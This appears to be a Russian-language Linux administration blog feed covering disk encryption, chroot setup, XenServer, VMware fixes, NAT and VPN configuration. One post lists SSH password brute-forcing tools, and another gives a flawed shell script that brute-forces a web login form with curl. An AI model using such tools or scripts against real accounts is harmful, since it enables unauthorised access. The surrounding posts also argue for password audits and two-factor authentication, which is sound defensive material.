В последнее время начал активно использовать на служебном ноутбуке Linux Debian 5 версии. Удобно и поэкспериментировать иногда, и для работы достаточно хорошо подходит – Gnome, Office 2007 запускается под wine, jdk для Cisco ASDM, VMWare Workstation и много другого необходимого софта.
Так как ноутбук вещь такая что украсть ее не так сложно как настольный ПК, озаботился я шифрованием жесткого диска, так как куча приватной информации хранится на ноутбуке – приватные ключи для доступа к корпоративной сети, служебная переписка, личная переписка и мало ли еще какой приватной информации которую очень не хотелось бы отдавать в чужие руки. Приступим.
Шаг 1.
Для начала необходимо установить ПО для обеспечения возможности шифрования:
apt-get install cryptsetup
apt-get install mdadm
apt-get install lvm2
В ядре должна быть включена поддержка LVM – в ядре из дистрибутива дело обстоит именно так.
Моя таблица разделов выглядит так:
/dev/sda1 * 1 26 204800 7 HPFS/NTFS
/dev/sda2 26 10077 80737678+ 83 Linux
/dev/sda3 10078 19457 75344850 83 Linux
Читать далее »
From: netf0x / Май 13th, 2009 / Linux | Ответов: 1 »
Моя Система:
Debian squeeze/sid
Подготовка к созданию chroot-окружения:
mkdir -p /jails/test/
apt-get install debootstrap
Для создания минимального окружения chroot будем использовать debootstrap.
Формат команды следующий:
# /usr/sbin/debootstrap –arch ARCH lenny /where/debinst http://ftp.us.debian.org/debian
Замените ARCH на один из следующих вариантов в команде запуска debootstrap: alpha, amd64, arm, armel, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 или sparc. У меня i386, поэтому я ставлю его.
lenny – дистрибутив который используем. Ну и адрес, откуда берем. Полный список зеркал Debian находится здесь – http://www.debian.org/mirror/list
В итоге у меня получилась следующая команда:
/usr/sbin/debootstrap --arch i386 lenny /jails/test/ http://mirror.yandex.ru/debian/
Некоторое время будет происходить установка базовой системы..
Смотрим – а там целая система.
rootfox:/jails/test# ls
bin boot dev etc home lib media mnt opt proc root sbin selinux srv sys tmp usr var
Монтируем необходимые виртуальные файловые системы если необходимо (пригодятся для использования например таких вещей как top в chroot):
mount -t proc proc /jails/test/proc
mount -t devpts devpts /jails/test/dev/pts
mount -t sysfs sysfs /jails/test/sys
Можно сразу добавить в fstab, что бы при следующих перезагрузках не ввводить эти команды вручную:
echo "proc /jails/test/proc proc defaults 0 0" >> /etc/fstab
echo "devpts /jails/test/dev/pts devpts defaults 0 0" >> /etc/fstab
echo "sysfs /jails/test/sys sysfs defaults 0 0" >> /etc/fstab
Устанавливаем нужный софт, locales – чтобы по русски date работала
chroot /jails/test/ aptitude install nano vim-full mc locales binutils ssh
Настраиваем локаль
chroot /jails/test/ dpkg-reconfigure locales
Все, теперь можно войти в этот chroot, например так:
chroot /jails/test /bin/bash
Можно установить какие-то программы, поэкспериментировать без риска нанести ущерб основной системе.
Если требуется что бы в chroot-окружении при старте системы запускался какой-то демон, например ssh, необходимо внести изменения в /etc/rc.local, например такие:
chroot /jails/test /etc/init.d/ssh start
Небольшая подборка наиболее популярного ПО для подбора паролей к ssh аккаунтам:
1. SSH Brute Forcer – UNIX/Linux утилита в виде shell-скрипта
http://www.securiteam.com/tools/5QP0L2K60E.html
2. THC-Hydra – Наиболее быстрый брутфорсер который умеет брутать очень многие популярные сервисы
http://freeworld.thc.org/thc-hydra/
3. SSHatter – Перловый скрипт
http://www.madirish.net/?article=183
4. SSHBrute – Скрипт на языке Python
http://www.darkc0de.com/bruteforce/sshbrute.py
Практически, эффективность атак методом перебора не самая эффективная.
Но статистика, вещь упрямая, показывает следующее:
1) как минимум 5 процентов пользователей выбирают пароль находящийся в списке “100 самых популярных”
2)из пункт 1, следует, что если в системе есть 25 пользователей, то можно рассчитать что эффективность атаки на систему составит: 1-(1-0.05)^25 = 0.72 т.е. 72%.;
3) или, например, если в системе 60 пользователей, то эффективность – 1-(1-0.05)^60 = 0.95 т.е. 95%.
Что говорит о том, что чем больше участников системы, тем более она уязвима.
В любом случае метод авторизации по паролю морально устарел, наступает черед методам двухфакторной авторизации взять свое.
Например в SSH можно использовать авторизацию по сертификату с паролем, в WWW и Mail-системах можно использовать авторизацию по сертификату и т.д.
Конечно пока что технически это возможно далеко не везде, но если вы используете парольную авторизацию и отвечаете за систему – соблюдайте парольную политику, проводите аудит паролей пользователей (например утилитой JohnTheRipper или CAIN), создавайте правила.
XenServer по умолчанию не имеет возможности подключить внешний HDD (например IDE) к виртуальной машине с сохранением данных. Авторами XenServer предполагается что подключая дополнительный жесткий диск вы будете инициализировать его посредством LVM, а в виртуальных машинах использовать виртуальные диски находящиеся в хранилище.
Мне же потребовалось добавить жесткий диск что бы использовать данные с него в виртуальной машине:
1. Добавляем в /etc/udev/rules.d/50-udev.rules:
ACTION=="add", KERNEL=="hda", SYMLINK+="xapi/block/%k", RUN+="/bin/sh -c '/opt/xensource/libexec/local-device-change %k 2>&1 >/dev/null&'"
ACTION=="remove", KERNEL=="hda", RUN+="/bin/sh -c '/opt/xensource/libexec/local-device-change %k 2>&1 >/dev/null&'"
Немного поясню:
KERNEL==”hda” – hda это мой жесткий диск на интерфейсе IDE который я подключаю (узнать как видится ваш можно просмотрев вывод dmesg)
ACTION – действие, при подключении и отключении устройства.
xapi/block – структура каталогов в /dev в которых XenServer ищет сменные устройства.
2. Перезагружаем и входим в XenCenter, там добавляем как Removable Storage к необходимой виртуальной машине.
1. Убеждаемся что в ядре включена поддержка WEB камеры и v4l2, что web-камера работает.
2. Ставим из репозитариев Mplayer и mencoder.
3.Тестируем:
mplayer tv:// -tv driver=v4l2:width=352:height=288:device=/dev/video0
4. Пишем видео:
mencoder tv:// -tv driver=v4l2:width=:height=:device=/dev/video0 -nosound -ovc lavc -o VideoFile.avi
5. Смотрим man mencoder, удивляемся количеству опций и изучаем.
Авторизация производится методом POST после успешной авторизации сервер меняет куки.
Условия заданы – приступим:
#!/bin/sh /*стандартный заголовок*/
# для задания файла паролей используйте команду > sh наш_скрипт файл_паролей
if [ -z $1 ]; then
echo -e "\n\t Использование: $0 password file"
exit 1;
fi
PASSWORDS='/bin/cat $1'
USER=admin
# если требуется кука
COOKIE1="blabla=blablabla;" /*измените на то что вам необходимо*/
CMD="/usr/bin/curl \
-b $COOKIE1 \
-d user=$USER \
-c cookies.txt \ /*а сюда упадут куки после удачной авторизации*/
--url http://localhost/login.php" /*путь к файлу паролей*/
for PASS in $PASSWORDS; do
# формируем необходимые заголовки
'$CMD \
-H 'User-Agent: Mozilla/4.0' \
-H 'Host: localhost' \
-d passwd=$PASS'
# проверим не угадан ли пароль
RES='grep -v $COOKIE cookies.txt'
if [ -n '$RES' ]; then
echo -e "found $RES with $USER : $PASS\n";
exit 0;
fi
done
Как то вот так..
VPN в Safe@Office реализован в четырех вариантах:
1. SecuRemote VPN сервер удаленного доступа: Создание VPN сервера подключение к которому осуществляется посредством ПО Check Point SecuRemote VPN Client (распространяется бесплатно вместе с Safe@Office).
2. SecuRemote VPN сервер внутреннего доступа. Используется для создания зашифрованных соединений внутри локальной или корпоративной сети. Используется чаще всего в беспроводных (Wi-Fi) сетях или отделами в которых проходят особо критические информационные потоки.
3. L2TP VPN Сервер. Позволяет подключаться к VPN-серверу без установки на машину пользователя лишнего ПО. Подключение осуществляется посредством стандартного Microsoft L2TP IPSec VPN Client. На устройстве создается пользователь, и ключ для IPSec.
4. Site-to-Site VPN Gateway. Возможность создания постоянных шифрованных туннелей. Требуется когда необходимо обеспечить постоянное прозрачное сетевое взаимодействие между удаленными сетями (например филиалами компании) через сеть Интернет.
В данной статье приводится пример настройки VPN-сервера Safe@Office для использования стандартного клиента Windows L2TP IPSEC VPN при удаленном подключении к офисной сети.
Читать далее »
В /etc/rc.conf –
natd_enable="YES"
natd_interface="rl1" #внутренний интерфейс шлюза
natd_flags="-f /etc/natd.conf"
В /etc/natd.conf –
same_ports yes
use_sockets yes
redirect_port tcp 192.168.0.1:81 81 #адрес и порт локальной машины пробел порт на внешнем интерфейсе
В настройки файервола, во избежание избыточных проверок сразу после правил НАТ-а –
# включаем nat
ipfw add divert 8668 ip from any to [внешний интерфейс шлюза] in via rl1
#Разрешаем общение с внешнего мира с заданным хостом-портом
ipfw allow tcp from any to 192.168.0.1 dst-port 81 in via rl1 setup
Столкнулся после установки VMWare на дистрибутиве Fedora 10 с проблемой – в гостевых машинах клавиатура работала совсем не так как надо. Нажимал кнопку Up – срабатывало как Alt+F2 и тому подобные неприятные вещи.
Проблема решилась добавлением в /etc/vmware/config строчки:
xkeymap.nokeycodeMap = true
или эту же строчку можно добавить в ~/.vmware/config
Успехов!
После установки свежего ядра Linux 2.6.29 перестала заводиться VMWare – все падало на этапе сборки модулей. Немного погуглив проблема была решена:
Качаем неофициальный патч: http://rootfox.com/downloads/vmware-modules-2.6.29.patch
Кладем его в /usr/lib/vmware/modules/source/
Там же распаковываем все присутствующие tar-архивы.
Применяем патч: “patch -p1 -i vmware-modules-2.6.29.patch”
Запаковываем все, что бы выглядело как было:
“tar -cf vmblock.tar vmblock-only/
tar -cf vmci.tar vmci-only/
tar -cf vmmon.tar vmmon-only/
tar -cf vmnet.tar vmnet-only/
tar -cf vsock.tar vsock-only/
tar -cf vmppuser.tar vmppuser-only/“